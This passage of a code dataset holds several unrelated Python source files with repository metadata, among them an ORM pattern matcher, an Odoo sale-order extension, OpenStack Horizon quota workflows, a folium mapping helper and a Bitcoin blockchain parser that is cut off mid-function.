are yielded.\"\"\"\n if context is None:\n context = {}\n for mapping in self._find_matches(context, partial=partial):\n yield orm.PatternMatch.from_mapping(self, mapping, context)\n\n def _find_matches(self, context: MatchMapping = None, *,\n partial: bool = False) -> typing.Iterator[MatchMapping]:\n if context is None:\n context = {}\n for mapping in self._find_full_matches(context):\n partial = False # We only return a partial if a full match was not found.\n yield mapping\n if partial:\n mapping = self._find_partial_match(context)\n if mapping is not None:\n # Remove images with attached data if we are partially matching. Otherwise, during\n # calls to apply() we will confabulate memories.\n to_remove = []\n for key, (value, score) in mapping.items():\n # TODO: This is flawed. Evidence means & sample counts will be in the data. We\n # need to know which keys correspond to data elements, vs. those that are\n # metadata used throughout the system. Also, are time values (and maybe\n # others) somehow different from other types of values? Sometimes we are\n # dealing with generic match constraints, and other times we are dealing\n # with specific references. Should we explicitly mark the patterns to\n # indicate which is which?\n if (value.vertex.count_data_keys() > 0 and\n key not in context and\n key.template.get(validate=False) not in context):\n to_remove.append(key)\n for key in to_remove:\n del mapping[key]\n yield mapping\n\n def _find_partial_match(self, context: MatchMapping) -> typing.Optional[MatchMapping]:\n \"\"\"Find and return a partial match. If no partial match can be found, return None.\"\"\"\n for mapping in self._find_full_matches(context):\n return mapping # Take the first full match, if any.\n # If there were no full matches, we need to search for partial ones.\n mapping = dict(context)\n for selector in self.selectors:\n for mapping in selector._find_matches(mapping, partial=True):\n break # Take the first one returned, if any.\n for child in self.children:\n for mapping in child._find_matches(mapping, partial=True):\n break # Take the first one returned, if any.\n return mapping\n\n def _find_full_matches(self, context: MatchMapping) -> typing.Iterator[MatchMapping]:\n \"\"\"Return an iterator over full matches for this pattern. Context should be a dictionary\n partially mapping from related patterns to their images; yielded matches will be constrained\n to satisfy this mapping.\"\"\"\n template = self.template.get(validate=False)\n if template is not None and template in context:\n context = dict(context)\n context[self] = context[template]\n # Check for any child pattern that doesn't have a match.\n for child in self.children:\n if child not in context:\n for child_match in child._find_full_matches(context):\n partial_match = dict(context)\n partial_match.update(child_match)\n assert child in partial_match\n yield from self._find_full_matches(partial_match)\n return\n if self in context:\n # We already have a match candidate for this pattern.\n # Check for any selector pattern that doesn't have a match.\n for selector in self.selectors:\n if selector not in context:\n # Selectors must always match the same vertex as the parent pattern.\n extended_context = dict(context)\n extended_context[selector] = extended_context[self]\n for selector_match in selector._find_full_matches(extended_context):\n partial_match = dict(context)\n partial_match.update(selector_match)\n assert selector in partial_match\n yield from self._find_full_matches(partial_match)\n return\n # There are no selectors to check, just yield the match.\n yield context\n else:\n # Go through each candidate and yield the matches that result.\n for candidate in self.find_match_candidates(context):\n mapping = dict(context)\n mapping[self] = candidate\n yield from self._find_full_matches(mapping)\n\n def score_candidates(self, candidates: typing.Iterable['schema.Schema'],\n context: MatchMapping) -> typing.Dict['schema.Schema', float]:\n \"\"\"Filter and score the given match candidates.\"\"\"\n\n assert self not in context, (self, candidates, context)\n\n # Initialize candidate scores.\n # The preimage representative vertex's evidence mean represents the target truth value for\n # the image vertex.\n scores: typing.Dict['schema.Schema', float] = {}\n vertex_target_truth_value = evidence.get_evidence_mean(self.match.vertex)\n for candidate in candidates:\n vertex_actual_truth_value = evidence.get_evidence_mean(candidate.vertex)\n candidate_match_quality = 1 - (vertex_target_truth_value -\n vertex_actual_truth_value) ** 2\n scores[candidate] = candidate_match_quality\n\n # We treat each edge adjacent to the match representative that isn't used strictly for\n # pattern-related bookkeeping as a match constraint.\n vertex = self.match.vertex\n for edge in itertools.chain(vertex.iter_outbound(), vertex.iter_inbound()):\n if edge.label.name in PATTERN_RELATED_LABEL_NAMES:\n continue\n outbound = edge.source == vertex\n other_vertex: elements.Vertex = edge.sink if outbound else edge.source\n other_value = schema_registry.get_schema(other_vertex, self.database)\n # other_pattern = other_value.pattern.get(validate=False)\n required_neighbor = required_neighbor_score = None\n if other_value.represented_pattern.defined:\n for other_pattern, other in context.items():\n if other_pattern.match != other_value:\n continue\n # If the match representative of this pattern is connected to another match\n # representative which is already mapped in the context, then we should\n # constrain the candidates to those that connect in the same way to the vertex\n # that the other match representative is mapped to. In simpler terms, we want\n # to make sure that any edges on the preimage side are also present on the image\n # side, but we can only do that if both patterns are mapped already.\n other_pattern_match, other_pattern_score = other\n required_neighbor = other_pattern_match.vertex\n required_neighbor_score = other_pattern_score\n else:\n # If the match representative of this pattern is connected to a vertex which is not\n # a match representative, then we treat the edge to the other vertex as a *literal*.\n # Any match for this pattern must also connect to that same exact vertex in the same\n # way.\n required_neighbor = other_vertex\n required_neighbor_score = 1.0\n if required_neighbor is not None:\n # The preimage edge's evidence mean represents the target truth value for the\n # image edge.\n edge_target_truth_value = evidence.get_evidence_mean(edge)\n to_remove = []\n for candidate in scores:\n scores[candidate] *= required_neighbor_score\n edge_image = candidate.vertex.get_edge(edge.label, required_neighbor,\n outbound=outbound)\n if edge_image is None:\n if not edge.label.transitive:\n to_remove.append(candidate)\n continue\n # neighbors = candidate.vertex.iter_transitive_neighbors(edge.label,\n # outbound=outbound)\n # if required_neighbor not in neighbors:\n # to_remove.append(candidate)\n # continue\n\n path = candidate.vertex.get_shortest_transitive_path(edge.label,\n required_neighbor,\n outbound=outbound)\n if path is None:\n to_remove.append(candidate)\n continue\n\n # TODO: When we apply evidence to direct edges in apply(), we should also\n # do the same for each edge in transitive paths where they are what is\n # matched.\n # Use the product of evidence means of the edges that were followed to\n # modulate the score for the candidate.\n edge_actual_truth_value = 1\n for path_edge, _path_vertex in path:\n if path_edge is not None:\n edge_actual_truth_value *= evidence.get_evidence_mean(path_edge)\n else:\n edge_actual_truth_value = evidence.get_evidence_mean(edge_image)\n edge_match_quality = 1 - (edge_target_truth_value -\n edge_actual_truth_value) ** 2\n scores[candidate] *= edge_match_quality\n for candidate in to_remove:\n del scores[candidate]\n\n # Use selectors to further modulate the score.\n for selector in self.selectors:\n selector_scores = selector.score_candidates(scores, context)\n to_remove = []\n for candidate in scores:\n selector_score = selector_scores.get(candidate, None)\n if selector_score is None:\n to_remove.append(candidate)\n else:\n scores[candidate] *= selector_score\n for candidate in to_remove:\n del scores[candidate]\n\n return scores\n\n def find_match_candidates(self, context: MatchMapping = None,\n neighbor: elements.Vertex = None) \\\n -> typing.Iterator[typing.Tuple[MatchSchema, float]]:\n \"\"\"For each vertex that satisfies the pattern's constraints, yield the vertex as a\n candidate. NOTE: To satisfy a pattern's constraints, a vertex must also be a valid\n match for every selector of the pattern.\n\n If neighbor is not None, the method only looks at vertices that are neighbors to the given\n vertex.\n \"\"\"\n\n # Find edges to/from the match representative which link to vertices that are not match\n # representatives. Use these non-pattern vertices as a search starting point. For example,\n # if the match representative is an instance with a non-pattern kind associated with it, we\n # can look at instances of that kind. Once we have a source of candidates identified in this\n # way, we can filter it through the constraints to identify reasonable candidates.\n # We look first at intransitive edges because they are more efficient to work with.\n vertex = self.match.vertex\n for edge in itertools.chain(vertex.iter_outbound(), vertex.iter_inbound()):\n if edge.label.name in PATTERN_RELATED_LABEL_NAMES or edge.label.transitive:\n continue\n outbound = edge.source == vertex\n other_vertex: elements.Vertex = edge.sink if outbound else edge.source\n if neighbor is not None and neighbor != other_vertex:\n continue\n other_value = schema_registry.get_schema(other_vertex, self.database)\n # other_pattern = other_value.pattern.get(validate=False)\n if other_value.represented_pattern.defined:\n for other_pattern, other in context.items():\n if other_pattern.match != other_value:\n continue\n # Overwrite other_value/other_vertex with its image\n other_value, other_score = context[other_pattern]\n other_vertex = other_value.vertex\n break\n else:\n continue\n if outbound:\n candidate_set = {other_edge.source for other_edge in other_vertex.iter_inbound()\n if other_edge.label == edge.label}\n else:\n candidate_set = {other_edge.sink for other_edge in other_vertex.iter_outbound()\n if other_edge.label == edge.label}\n break\n else:\n # If we can't find a good intransitive edge, look at transitive ones.\n for edge in itertools.chain(vertex.iter_outbound(), vertex.iter_inbound()):\n if edge.label.name in PATTERN_RELATED_LABEL_NAMES or not edge.label.transitive:\n continue\n outbound = edge.source == vertex\n other_vertex: elements.Vertex = edge.sink if outbound else edge.source\n if neighbor is not None and neighbor != other_vertex:\n continue\n other_value = schema_registry.get_schema(other_vertex, self.database)\n # other_pattern = other_value.pattern.get(validate=False)\n if other_value.represented_pattern.defined:\n for other_pattern, other in context.items():\n if other_pattern.match != other_value:\n continue\n # Overwrite other_value/other_vertex with its image\n other_value, other_score = context[other_pattern]\n other_vertex = other_value.vertex\n break\n else:\n continue\n candidate_set = set(other_vertex.iter_transitive_neighbors(edge.label,\n outbound=not outbound))\n break\n else:\n # If we don't have a relevant and well-defined set of candidates to choose from, we\n # should just fail to match. Trying every vertex in the graph is simply not an\n # option.\n logging.info(\"No candidates found for: %s\", self)\n return\n\n # TODO: We should maybe check data keys first. But I'm not sure if they'll even be used\n # for pattern matching yet.\n\n candidate_set = {schema_registry.get_schema(candidate, self.database)\n for candidate in candidate_set}\n candidate_set = {value for value in candidate_set if not value.represented_pattern.defined}\n candidate_scores = self.score_candidates(candidate_set, context)\n\n # Yield them in descending order of evidence to get the best matches first.\n yield from sorted(candidate_scores.items(), key=lambda item: item[-1], reverse=True)\n\n def iter_trigger_points(self) -> typing.Iterator[typing.Tuple['Pattern', 'schema.Schema']]:\n vertex = self.match.vertex\n for edge in itertools.chain(vertex.iter_outbound(), vertex.iter_inbound()):\n if edge.label.name in PATTERN_RELATED_LABEL_NAMES or edge.label.transitive:\n continue\n outbound = edge.source == vertex\n other_vertex: elements.Vertex = edge.sink if outbound else edge.source\n other_value = schema_registry.get_schema(other_vertex, self.database)\n if not other_value.represented_pattern.defined:\n yield self, other_value\n for child in self.children:\n yield from child.iter_trigger_points()\n","repo_name":"hosford42/Semantics","sub_path":"semantics/kb_layer/orm/_pattern_schema.py","file_name":"_pattern_schema.py","file_ext":"py","file_size_in_byte":21255,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"13858953839","text":"from dbd import sqliteQueries as sql\nfrom dbd.ram2dbd import ram2sqlite\nfrom xdb.xdb2ram import Parser\ndb_path = \"ResultAndResource/resultXml2Dbd.db\"\nmetadata_path=\"ResultAndResource/tasks.xml\"\nparser = Parser(metadata_path) #применяем xdb2ram\nschema = parser.parseXdb2Ram() #вызываем метод класса для конвертирования xml в ram\n\nuploader = ram2sqlite(sql, db_path) #вызываем конструктор класса ram2sqlite\nuploader.upload(schema) #вызываем метод\n\nprint(\"database \"+db_path+\" was created\")","repo_name":"VovaMax/letsGo","sub_path":"xml2dbd.py","file_name":"xml2dbd.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25122511173","text":"\nimport os\nimport json\n\n\n# variables \nprefix = \"?\"\nembedColor = 0xd3d3d3\nicon = \"https://cdn.discordapp.com/avatars/917390822939447307/762c5053cda62e609ee954b7868b42d5.png?size=4096\"\n\n\nallowedChannels = json.loads(os.environ['BOT_INTERACTION_CHANNEL_ID'])\n\nwallet_ERC20 = \"soon\"\nwallet_akash = \"soon\"\n","repo_name":"golemfactory/GDP-tech-support","sub_path":"src/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"27213940256","text":"\n\ndef cadastrar() -> dict:\n\n print('Informações')\n nome = ler_nome()\n idade = ler_idade()\n\n return {'nome': nome, 'idade': idade}\n\n\ndef ler_nome() -> str:\n\n msn = 'Nome: '\n\n while True:\n nome = input(msn).strip()\n\n nome = nome.replace('.', '')\n\n if not nome.isdigit():\n return nome.title()\n msn = 'Informe um nome válido: '\n\n\ndef ler_idade() -> int:\n\n while True:\n idade = ler_int('Idade: ')\n\n if idade <= 0:\n print(f'Idade inválida: {idade}', msn=True)\n continue\n\n return idade\n\n\ndef menu():\n print(\n f'{\" Menu \":=^32}',\n f'{ \"1 - Listar Pessoas\"}',\n f'{ \"2 - Cadastrar Pessoa\"}',\n f'{ \"3 - sair\"}',\n f'{\"=\"*32}',\n sep='\\n'\n )\n\n\ndef ler_int(msn):\n try:\n valor = int(input(msn))\n\n return valor\n except ValueError:\n print(f'valor inválido: {valor}')\n return ler_int('Insira uma valor válido: ')\n\n\ndef listar_pessoas(lista):\n\n for pessoa in lista:\n print(f'Nome: {pessoa[\"nome\"]}, idade: {pessoa[\"idade\"]}')\n","repo_name":"Lidianacosta/trilha-back-end-python","sub_path":"capacitacao/semana_IIIIII/basic/ erros_e_excecoes/115/modelo/dados/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29810390128","text":"p, m = map(int, input().split())\n\nrooms = []\nfor _ in range(p):\n line = input().split()\n level, name = int(line[0]), line[1]\n for room in rooms:\n # 입장 가능한 방이 있다면 다 찰 때까지 대기 (제일 먼저 생성된 방으로)\n if room[0][0] - 10 <= level <= room[0][0] + 10 and len(room) < m:\n room.append((level, name))\n break\n # 매칭 가능한 방이 없다면 방 생성 (-10 ~ +10)\n else:\n room = [(level, name)]\n rooms.append(room)\n\nfor room in rooms:\n if len(room) == m:\n print('Started!')\n else:\n print('Waiting!')\n\n for player in sorted(room, key=lambda x: x[1]):\n print(player[0], player[1])\n","repo_name":"zoolake/pythonPS","sub_path":"boj/20006.py","file_name":"20006.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"33917977084","text":"# -*- coding: utf-8 -*-\n\nfrom datetime import datetime, timedelta\nfrom functools import partial\nfrom itertools import groupby\n\nfrom odoo import api, fields, models, SUPERUSER_ID, _\nfrom odoo.exceptions import AccessError, UserError, ValidationError\nfrom odoo.tools.misc import formatLang, get_lang\nfrom odoo.osv import expression\nfrom odoo.tools import float_is_zero, float_compare\n\nfrom werkzeug.urls import url_encode\n\nclass SaleOrder(models.Model):\n _inherit = \"sale.order\"\n\n @api.onchange('partner_id')\n def onchange_partner_id(self):\n \"\"\"\n Update the following fields when the partner is changed:\n - Pricelist\n - Payment terms\n - Invoice address\n - Delivery address\n - Sales Team\n - Incoterms\n # - Agente Esterno\n \"\"\"\n if not self.partner_id:\n self.update({\n 'partner_invoice_id': False,\n 'partner_shipping_id': False,\n 'fiscal_position_id': False,\n 'x_studio_incoterms': '',\n # 'x_studio_agente_esterno' : '',\n })\n return\n\n self = self.with_company(self.company_id)\n\n addr = self.partner_id.address_get(['delivery', 'invoice'])\n partner_user = self.partner_id.user_id or self.partner_id.commercial_partner_id.user_id\n incoterms = self.partner_id.x_studio_incoterms_1.code\n # agente_esterno = self.partner_id._studio_many2one_field_6csFz.display_name\n values = {\n 'pricelist_id': self.partner_id.property_product_pricelist and self.partner_id.property_product_pricelist.id or False,\n 'payment_term_id': self.partner_id.property_payment_term_id and self.partner_id.property_payment_term_id.id or False,\n 'partner_invoice_id': addr['invoice'],\n 'partner_shipping_id': addr['delivery'],\n 'x_studio_incoterms': incoterms,\n # 'x_studio_agente_esterno' : ageste_esterno,\n }\n user_id = partner_user.id\n if not self.env.context.get('not_self_saleperson'):\n user_id = user_id or self.env.uid\n if user_id and self.user_id.id != user_id:\n values['user_id'] = user_id\n\n if self.env['ir.config_parameter'].sudo().get_param('account.use_invoice_terms') and self.env.company.invoice_terms:\n values['note'] = self.with_context(lang=self.partner_id.lang).env.company.invoice_terms\n if not self.env.context.get('not_self_saleperson') or not self.team_id:\n values['team_id'] = self.env['crm.team'].with_context(\n default_team_id=self.partner_id.team_id.id\n )._get_default_team_id(domain=['|', ('company_id', '=', self.company_id.id), ('company_id', '=', False)], user_id=user_id)\n self.update(values)\n\n# def create(self, vals):\n# if 'company_id' in vals:\n# self = self.with_company(vals['company_id'])\n# if vals.get('name', _('New')) == _('New'):\n# seq_date = None\n# if 'date_order' in vals:\n# seq_date = fields.Datetime.context_timestamp(self, fields.Datetime.to_datetime(vals['date_order']))\n# vals['name'] = self.env['ir.sequence'].next_by_code('sale.order', sequence_date=seq_date) or _('New')\n\n# # Makes sure partner_invoice_id', 'partner_shipping_id' and 'pricelist_id' are defined\n# if any(f not in vals for f in ['partner_invoice_id', 'partner_shipping_id', 'pricelist_id']):\n# partner = self.env['res.partner'].browse(vals.get('partner_id'))\n# addr = partner.address_get(['delivery', 'invoice'])\n# vals['partner_invoice_id'] = vals.setdefault('partner_invoice_id', addr['invoice'])\n# vals['partner_shipping_id'] = vals.setdefault('partner_shipping_id', addr['delivery'])\n# vals['pricelist_id'] = vals.setdefault('pricelist_id', partner.property_product_pricelist.id)\n# vals['x_studio_incoterms'] = partner.x_studio_incoterms_1.code\n# result = super(SaleOrder, self).create(vals)\n# return result\n\n","repo_name":"stayted/DA-Odoo","sub_path":"MPFE-create-order/models/sale_order.py","file_name":"sale_order.py","file_ext":"py","file_size_in_byte":4064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"26665979375","text":"#\n# @lc app=leetcode id=199 lang=python3\n#\n# [199] Binary Tree Right Side View\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def rightSideView(self, root: TreeNode) -> List[int]:\n\n if not root:\n return []\n \n queue = deque([root])\n \n ans = []\n while queue:\n items = []\n for i in range(len(queue)):\n root = queue.popleft()\n items.append(root.val)\n if root.left:\n queue.append(root.left)\n if root.right:\n queue.append(root.right)\n ans.append(items[-1])\n \n return ans\n \n# @lc code=end\n\n","repo_name":"waynewu6250/LeetCode-Solutions","sub_path":"199.binary-tree-right-side-view.py","file_name":"199.binary-tree-right-side-view.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24827864618","text":"\r\n\r\nfrom lib_api import foursquare_visual\r\n\r\nfrom folium import Marker, Icon, Map\r\nimport pandas as pd\r\nfrom keplergl import KeplerGl\r\n\r\ndef imprime_mapa(lat,lon):\r\n \"\"\"\r\n imprime un mapa carto de los serviciones que estamos estudiando\r\n lo hace centrado en lat long y. para realizar el mapa consulta en FS los resultados.\r\n\r\n tokens tiene que estar en .env\r\n\r\n devuelve el mapa\r\n \"\"\"\r\n\r\n lista=[\"colegio\", \"starbucks\",\"estadio de baloncesto\", \"bar\",\"restaurante vegano\",\"peluqueria perros\",\"aeropuerto\"]\r\n \r\n tipo=list()\r\n latitud=list()\r\n longitud=list()\r\n\r\n for q in lista:\r\n resultado=foursquare_visual({'latitud':lat, 'longitud':lon},q)\r\n \r\n for r in resultado:\r\n tipo.append(q.replace(\" \",\"_\"))\r\n latitud.append(r['latitud'])\r\n longitud.append(r['longitud'])\r\n #if q == \"colegio\" or q == \"peluqueria perros\":\r\n # print(pd.DataFrame({'tipo':tipo,'latitud':latitud,'logitud':longitud}))\r\n # raise\r\n \r\n \r\n df=pd.DataFrame({'tipo':tipo,'latitud':latitud,'logitud':longitud})\r\n\r\n \r\n\r\n mapa = Map(location=[lat,lon],zoom_start=15)\r\n\r\n empresa = {\r\n \"location\":[lat, lon ],\r\n \"tooltip\" : \"Empresa\"\r\n }\r\n icon = Icon(color = \"red\",\r\n prefix = \"fa\",\r\n icon = \"fa-dot-circle-o\",\r\n icon_color = \"white\"\r\n )\r\n Marker(**empresa,icon = icon ).add_to(mapa)\r\n\r\n\r\n for i, row in df.iterrows():\r\n establecimiento = {\r\n \"location\":[row[\"latitud\"], row[\"logitud\"]],\r\n \"tooltip\" : row[\"tipo\"].replace(\"_\",\" \").capitalize()\r\n }\r\n\r\n if row[\"tipo\"] == \"starbucks\":\r\n icon = Icon(color = \"green\",\r\n prefix = \"fa\",\r\n icon = \"fa-coffee\",\r\n icon_color = \"white\"\r\n )\r\n \r\n elif row[\"tipo\"] == \"restaurante_vegano\":\r\n icon = Icon(color = \"green\",\r\n prefix = \"fa\",\r\n icon = \"leaf\",\r\n icon_color = \"black\"\r\n )\r\n\r\n elif row[\"tipo\"] == \"colegio\":\r\n icon = Icon(color = \"blue\",\r\n prefix = \"fa\",\r\n icon = \"fa-graduation-cap \",\r\n icon_color = \"black\"\r\n )\r\n \r\n elif row[\"tipo\"] == \"peluqueria_perros\":\r\n icon = Icon(color = \"red\",\r\n prefix = \"fa\",\r\n icon = \"fa-paw\",\r\n icon_color = \"black\"\r\n )\r\n\r\n elif row[\"tipo\"] == \"estadio_de_baloncesto\":\r\n icon = Icon(color = \"orange\",\r\n prefix = \"fa\",\r\n icon = \"fa-futbol-o \",\r\n icon_color = \"black\"\r\n )\r\n\r\n elif row[\"tipo\"] == \"aeropuerto\":\r\n icon = Icon(color = \"white\",\r\n prefix = \"fa\",\r\n icon = \"fa-plane\",\r\n icon_color = \"black\"\r\n )\r\n elif row[\"tipo\"] == \"bar\":\r\n icon = Icon(color = \"pink\",\r\n prefix = \"fa\",\r\n icon = \"fa-glass\",\r\n icon_color = \"white\"\r\n )\r\n \r\n else:\r\n prefix = \"fa\",\r\n icon = \"briefcase\",\r\n icon_color = \"black\" \r\n Marker(**establecimiento,icon = icon ).add_to(mapa)\r\n return mapa\r\n\r\ndef imprime_kepler(df):\r\n \"\"\"\r\n no lo he podido utilizar\r\n \"\"\"\r\n map_kepler= KeplerGl(height=700, weight = 500, data={'Empresas': df})\r\n map_kepler\r\n#show the map","repo_name":"emilio-carrasco/geospace_project","sub_path":"libs/lib_visual.py","file_name":"lib_visual.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73512489113","text":"import logging\n\nfrom django.utils.translation import gettext_lazy as _\n\nfrom horizon import exceptions\nfrom horizon import forms\nfrom horizon import workflows\n\nfrom openstack_dashboard.api import base\nfrom openstack_dashboard.api import cinder\nfrom openstack_dashboard.api import nova\nfrom openstack_dashboard.usage import quotas\n\nLOG = logging.getLogger(__name__)\n\n\nclass UpdateDefaultComputeQuotasAction(workflows.Action):\n instances = forms.IntegerField(min_value=-1, label=_(\"Instances\"))\n cores = forms.IntegerField(min_value=-1, label=_(\"VCPUs\"))\n ram = forms.IntegerField(min_value=-1, label=_(\"RAM (MB)\"))\n metadata_items = forms.IntegerField(min_value=-1,\n label=_(\"Metadata Items\"))\n key_pairs = forms.IntegerField(min_value=-1, label=_(\"Key Pairs\"))\n server_groups = forms.IntegerField(min_value=-1, label=_(\"Server Groups\"))\n server_group_members = forms.IntegerField(\n min_value=-1, label=_(\"Server Group Members\"))\n injected_files = forms.IntegerField(min_value=-1,\n label=_(\"Injected Files\"))\n injected_file_content_bytes = forms.IntegerField(\n min_value=-1,\n label=_(\"Injected File Content (B)\"))\n injected_file_path_bytes = forms.IntegerField(\n min_value=-1,\n label=_(\"Length of Injected File Path\"))\n\n def __init__(self, request, context, *args, **kwargs):\n super().__init__(request, context, *args, **kwargs)\n disabled_quotas = context['disabled_quotas']\n for field in disabled_quotas:\n if field in self.fields:\n self.fields[field].required = False\n self.fields[field].widget = forms.HiddenInput()\n\n def handle(self, request, context):\n nova_data = {\n key: value for key, value in context.items()\n if key in quotas.NOVA_QUOTA_FIELDS\n }\n try:\n nova.default_quota_update(request, **nova_data)\n return True\n except Exception:\n exceptions.handle(request,\n _('Unable to update default compute quotas.'))\n return False\n\n class Meta(object):\n name = _(\"Compute\")\n slug = 'update_default_compute_quotas'\n help_text = _(\"From here you can update the default compute quotas \"\n \"(max limits).\")\n\n\nclass UpdateDefaultComputeQuotasStep(workflows.Step):\n action_class = UpdateDefaultComputeQuotasAction\n contributes = quotas.NOVA_QUOTA_FIELDS\n depends_on = ('disabled_quotas',)\n\n def prepare_action_context(self, request, context):\n try:\n quota_defaults = nova.default_quota_get(request,\n request.user.tenant_id)\n for field in quotas.NOVA_QUOTA_FIELDS:\n context[field] = quota_defaults.get(field).limit\n except Exception:\n exceptions.handle(request,\n _('Unable to retrieve default compute quotas.'))\n return context\n\n def allowed(self, request):\n return base.is_service_enabled(request, 'compute')\n\n\nclass UpdateDefaultVolumeQuotasAction(workflows.Action):\n volumes = forms.IntegerField(min_value=-1, label=_(\"Volumes\"))\n gigabytes = forms.IntegerField(\n min_value=-1,\n label=_(\"Total Size of Volumes and Snapshots (GiB)\"))\n snapshots = forms.IntegerField(min_value=-1, label=_(\"Volume Snapshots\"))\n\n def __init__(self, request, context, *args, **kwargs):\n super().__init__(request, context, *args, **kwargs)\n disabled_quotas = context['disabled_quotas']\n for field in disabled_quotas:\n if field in self.fields:\n self.fields[field].required = False\n self.fields[field].widget = forms.HiddenInput()\n\n def handle(self, request, context):\n cinder_data = {\n key: value for key, value in context.items()\n if key in quotas.CINDER_QUOTA_FIELDS\n }\n try:\n cinder.default_quota_update(request, **cinder_data)\n return True\n except Exception:\n exceptions.handle(request,\n _('Unable to update default volume quotas.'))\n return False\n\n class Meta(object):\n name = _(\"Volume\")\n slug = 'update_default_volume_quotas'\n help_text = _(\"From here you can update the default volume quotas \"\n \"(max limits).\")\n\n\nclass UpdateDefaultVolumeQuotasStep(workflows.Step):\n action_class = UpdateDefaultVolumeQuotasAction\n contributes = quotas.CINDER_QUOTA_FIELDS\n depends_on = ('disabled_quotas',)\n\n def prepare_action_context(self, request, context):\n try:\n quota_defaults = cinder.default_quota_get(request,\n request.user.tenant_id)\n for field in quotas.CINDER_QUOTA_FIELDS:\n context[field] = quota_defaults.get(field).limit\n except Exception:\n exceptions.handle(request,\n _('Unable to retrieve default volume quotas.'))\n return context\n\n def allowed(self, request):\n return cinder.is_volume_service_enabled(request)\n\n\nclass UpdateDefaultQuotas(workflows.Workflow):\n slug = \"update_default_quotas\"\n name = _(\"Update Default Quotas\")\n finalize_button_name = _(\"Update Defaults\")\n success_message = _('Default quotas updated.')\n failure_message = _('Unable to update default quotas.')\n success_url = \"horizon:admin:defaults:index\"\n default_steps = (UpdateDefaultComputeQuotasStep,\n UpdateDefaultVolumeQuotasStep)\n","repo_name":"openstack/horizon","sub_path":"openstack_dashboard/dashboards/admin/defaults/workflows.py","file_name":"workflows.py","file_ext":"py","file_size_in_byte":5711,"program_lang":"python","lang":"en","doc_type":"code","stars":1314,"dataset":"github-code","pt":"5"} +{"seq_id":"38705480373","text":"from blockchain_parser.blockchain import Blockchain\r\nimport csv\r\nimport json, os, sys, datetime, re\r\nimport plyvel\r\nimport time\r\n\r\n\r\nbitcoinPath = ''\r\nif os.path.exists('/media/sf_Bitcoin/blocks'):\r\n\tbitcoinPath = '/media/sf_Bitcoin' # Virtual machine shared folder\r\nelif os.path.exists('/media/sf_BitcoinVictim/blocks'):\r\n\tbitcoinPath = '/media/sf_BitcoinVictim'\r\nelif os.path.exists('/media/sf_BitcoinAttacker/blocks'):\r\n\tbitcoinPath = '/media/sf_BitcoinAttacker'\r\nelif os.path.exists(f'/media/{os.getlogin()}/BITCOIN/blocks'):\r\n\tbitcoinPath = f'/media/{os.getlogin()}/BITCOIN'\r\nelif os.path.exists(f'/media/{os.getlogin()}/Blockchains/Bitcoin/blocks'):\r\n\tbitcoinPath = f'/media/{os.getlogin()}/Blockchains/Bitcoin'\r\nelif os.path.exists(f'/media/{os.getlogin()}/Long Term Storage/Bitcoin/blocks'):\r\n\tbitcoinPath = f'/media/{os.getlogin()}/Long Term Storage/Bitcoin'\r\n\r\n\r\nbitcoinBlocksPath = os.path.join(bitcoinPath, 'blocks')\r\nbitcoinTxIndexesPath = os.path.join(bitcoinPath, 'indexes/txindex')\r\n\r\noutputDatabaseFileName = os.path.expanduser(os.path.join('~', 'Desktop', 'Bitcoin Transaction Database.csv'))\r\noutputMappingFileName = os.path.expanduser(os.path.join('~', 'Desktop', 'Bitcoin Transaction Mapping Addresses.csv'))\r\n\r\nstartHeight = 0\r\nendHeight = 744578\r\n\r\nif not os.path.exists(bitcoinBlocksPath):\r\n\tprint(bitcoinBlocksPath + ' does not exist.')\r\n\tsys.exit()\r\n\r\nblockchain = Blockchain(os.path.expanduser(bitcoinBlocksPath))\r\ndb = plyvel.DB(bitcoinTxIndexesPath, compression=None)\r\n\r\nepoch = datetime.datetime.utcfromtimestamp(0)\r\ncounter = 0\r\n\r\naddressMap = {}\r\naddressMapCount = 0\r\nsessionResumed = False\r\n\r\ndef resumeSession():\r\n\tglobal outputDatabaseFileName, outputMappingFileName, counter, addressMap, addressMapCount, sessionResumed\r\n\r\n\tprint(' Resuming address mapping...')\r\n\taddressMapFile = open(outputMappingFileName, 'r')\r\n\taddressMapReader = csv.reader(addressMapFile)\r\n\theader = next(addressMapReader)\r\n\tfor row in addressMapReader:\r\n\t\taddressMap[row[1]] = int(row[0])\r\n\t\taddressMapCount += 1\r\n\taddressMapFile.close()\r\n\r\n\tprint(' Reading database to get last line...')\r\n\twith open(outputDatabaseFileName, 'rb') as file:\r\n\t\ttry:\r\n\t\t\tfile.seek(-2, os.SEEK_END)\r\n\t\t\twhile file.read(1) != b'\\n':\r\n\t\t\t\tfile.seek(-2, os.SEEK_CUR)\r\n\t\texcept OSError:\r\n\t\t\tfile.seek(0)\r\n\t\tlastLine = file.readline().decode()\r\n\r\n\tlastBlockHeight = lastLine.split(',')[1]\r\n\tprint(' Block height to resume:', lastBlockHeight)\r\n\t# We want to break early in case the block height isn't an int\r\n\tlastBlockHeightInt = int(lastBlockHeight)\r\n\r\n\ttempFileName = outputDatabaseFileName[:-4] + '_TEMP.csv'\r\n\tos.replace(outputDatabaseFileName, tempFileName)\r\n\r\n\tprev_output = open(tempFileName, 'r')\r\n\toutput = open(outputDatabaseFileName, 'w+')\r\n\r\n\t# Removing all old remnants of the last block height so that we can start writing to it 